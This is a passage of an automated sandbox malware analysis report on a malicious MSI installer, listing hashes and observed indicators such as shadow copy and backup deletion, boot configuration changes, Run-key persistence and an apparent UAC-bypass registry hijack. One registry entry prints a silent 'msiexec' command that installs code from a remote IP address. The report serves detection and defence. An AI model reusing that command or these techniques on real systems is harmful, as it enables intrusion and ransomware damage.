Resubmissions
15/02/2023, 12:16
230215-pfpz9abf74 1015/02/2023, 11:44
230215-nv62msbd2z 1015/02/2023, 10:05
230215-l4rbfabc82 10Analysis
-
max time kernel
575s -
max time network
595s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
15/02/2023, 12:16
Static task
static1
Behavioral task
behavioral1
Sample
Nicht bestätigt 172391.msi
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
Nicht bestätigt 172391.msi
Resource
win10v2004-20220812-en
General
-
Target
Nicht bestätigt 172391.msi
-
Size
13.5MB
-
MD5
2e3bdf628e9bfaa6fe04786c390bdc6e
-
SHA1
09e783f6b97b7e84e0b736b8db308d25a8c22633
-
SHA256
079c18a81472a9ed6c3f7522d2013a813ae24c50b2e5e7ea79c4d280e60a3c4e
-
SHA512
cc0a6b5ba08534c73f180160699e65fa02afb2f9551cae25442d8d9f96cf5457aea2d4b15d4467f2ddf81cdec31adfe468b80f3397ddbdf5550e33ecf487fe47
-
SSDEEP
3072:imCP97KZrhPNN0JNIT3DM8X2Rb+kDRsT:idF+BhPNNkNIzDdmRKkDk
Malware Config
Signatures
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3564 632 cmd.exe 77 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1656 632 cmd.exe 77 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1684 632 cmd.exe 77 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3384 632 cmd.exe 77 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4768 632 cmd.exe 77 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1468 632 cmd.exe 77 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4660 632 cmd.exe 77 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1696 632 cmd.exe 77 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4292 632 cmd.exe 77 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3152 632 cmd.exe 77 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3804 632 cmd.exe 77 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4604 632 cmd.exe 77 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3036 632 cmd.exe 77 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3808 632 cmd.exe 77 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2448 632 cmd.exe 77 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4288 632 cmd.exe 77 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1632 632 cmd.exe 77 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2148 632 cmd.exe 77 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 6 IoCs
pid Process 424 bcdedit.exe 5088 bcdedit.exe 3984 bcdedit.exe 1120 bcdedit.exe 4432 bcdedit.exe 1920 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1264 msiexec.exe -
pid Process 4324 wbadmin.exe 1676 wbadmin.exe 4076 wbadmin.exe -
pid Process 3396 wbadmin.exe 1160 wbadmin.exe 1676 wbadmin.exe -
Executes dropped EXE 1 IoCs
pid Process 5964 ChromeRecovery.exe -
Loads dropped DLL 1 IoCs
pid Process 4312 MsiExec.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\acZvHejjfcG = "C:\\Users\\Public\\kacZvHejjfcG.c5e2524a-ea46-4f67-841f-6a9465d9d515" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\acZvHejjfcG = "C:\\Users\\Public\\kacZvHejjfcG.c5e2524a-ea46-4f67-841f-6a9465d9d515" msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\acZvHejjfcG = "C:\\Users\\Public\\kacZvHejjfcG.c5e2524a-ea46-4f67-841f-6a9465d9d515" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\acZvHejjfcG = "C:\\Users\\Public\\kacZvHejjfcG.c5e2524a-ea46-4f67-841f-6a9465d9d515" MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Drops file in Program Files directory 9 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5872_886862148\_metadata\verified_contents.json elevation_service.exe File opened for modification C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5872_886862148\_metadata\verified_contents.json elevation_service.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\c51da1b2-b0d9-40b1-9c92-ffd816f0647c.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230215132018.pma setup.exe File created C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5872_886862148\ChromeRecoveryCRX.crx elevation_service.exe File opened for modification C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5872_886862148\manifest.json elevation_service.exe File created C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5872_886862148\ChromeRecovery.exe elevation_service.exe File opened for modification C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5872_886862148\ChromeRecovery.exe elevation_service.exe File created C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5872_886862148\manifest.json elevation_service.exe -
Drops file in Windows directory 11 IoCs
description ioc Process File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIE88B.tmp msiexec.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File created C:\Windows\Installer\e57e520.msi msiexec.exe File opened for modification C:\Windows\Installer\e57e520.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe File created C:\Windows\Installer\SourceHash{FFCEE76B-CFA9-4D82-92FB-930909E9ADF4} msiexec.exe File created C:\Windows\Installer\e57e522.msi msiexec.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 1648 3248 WerFault.exe 56 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000007c4a2b5d7b48cb040000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800007c4a2b5d0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff0000000007000100006809007c4a2b5d000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000007c4a2b5d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000007c4a2b5d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\IESettingSync Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch Explorer.EXE -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "1451" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "2234" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\PersistedStorageItemTable\System RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\AppX1apmywg4z9t3tk3nrn9y8ntjc5cg9675\Shell\open\command\DelegateExecute msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" sihost.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\MuiCache ComputerDefaults.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Rev = "0" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\PersistedStorageItemTable\System\74be88fe-056a-44fc-b604-cf1a4cfb82fa. = ac57fb2a4041d901 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "2234" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\AppX8mn6f6acw2d3hves535dpq0zqnxqkec7\Shell\open\command\ = "AppX8mn6f6acw2d3hves535dpq0zqnxqkec7" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\ms-settings\CurVer msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\PersistedStorageItemTable\System\74be88fe-056a-44fc-b604-cf1a4cfb82fa. = "\\\\?\\Volume{5D2B4A7C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.Search_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{95f5c8a3-5207-4e8d-a4ac-1fe00940deb0}\\ConstraintIndex.cab" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\AppX8mn6f6acw2d3hves535dpq0zqnxqkec7\Shell\open\command\ = "msiexec /i http://116.203.6.196/ /q" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "223" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "1266" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings ComputerDefaults.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\ms-settings\CurVer\ = "AppX1apmywg4z9t3tk3nrn9y8ntjc5cg9675" msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Pictures" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616193" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "887" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\MuiCache SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 3a002e80d43aad2469a5304598e1ab02f9417aa8260001002600efbe110000003478d65282aed801e0a5f5c13f41d901214b24fe3f41d90114000000 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\AppX8mn6f6acw2d3hves535dpq0zqnxqkec7\Shell\open\command\DelegateExecute msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\PersistedStorageItemTable\System\74be88fe-056a-44fc-b604-cf1a4cfb82fa. = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000008828d72a4041d9018828d72a4041d9018828d72a4041d9010000000000000000010000000000000000000000000000001c0514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800b4003100000000000000000010004d6963726f736f66742e57696e646f77732e5365617263685f6377356e31683274787965777900007e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e005300650061007200630068005f006300770035006e003100680032007400780079006500770079000000360060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a006e00310000000000000000001000436f6e73747261696e74496e64657800500009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000043006f006e00730074007200610069006e00740049006e0064006500780000001e00c600310000000000000000001000496e7075745f7b39356635633861332d353230372d346538642d613461632d3166653030393430646562307d00008a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000049006e007000750074005f007b00390035006600350063003800610033002d0035003200300037002d0034006500380064002d0061003400610063002d003100660065003000300039003400300064006500620030007d0000003c0005013200000000004f56766a2000436f6e73747261696e74496e6465782e63616200580009000400efbe4f56766a4f56766a2e0000000000000000000000000000000000000000000000000078ef330043006f006e00730074007200610069006e00740049006e006400650078002e00630061006200000022008b0000002700efbe7d00000031535053b79daeff8d1cff43818c84403aa3732d6100000064000000001f000000270000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e005300650061007200630068005f006300770035006e0031006800320074007800790065007700790000000000000000000000000022000000de0000001c000000010000001c0000003400000000000000dd0000001800000003000000533385d61000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e5365617263685f6377356e3168327478796577795c4c6f63616c53746174655c436f6e73747261696e74496e6465785c496e7075745f7b39356635633861332d353230372d346538642d613461632d3166653030393430646562307d5c436f6e73747261696e74496e6465782e636162000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000787a696f666176640000000000000000244ecd0ae5297e4b9a9fb667cf3bd6bc7d74f79f7b1aed11aecbe62d9fd3cb0b244ecd0ae5297e4b9a9fb667cf3bd6bc7d74f79f7b1aed11aecbe62d9fd3cb0bca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0032003800390031003000320039003500370035002d0031003400360032003500370035002d0031003100360035003200310033003800300037002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000007c4a2b5d000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" MsiExec.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\AppX1apmywg4z9t3tk3nrn9y8ntjc5cg9675\Shell\open\command\ = "AppX1apmywg4z9t3tk3nrn9y8ntjc5cg9675" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668} Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "1266" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" ComputerDefaults.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Set value (str) 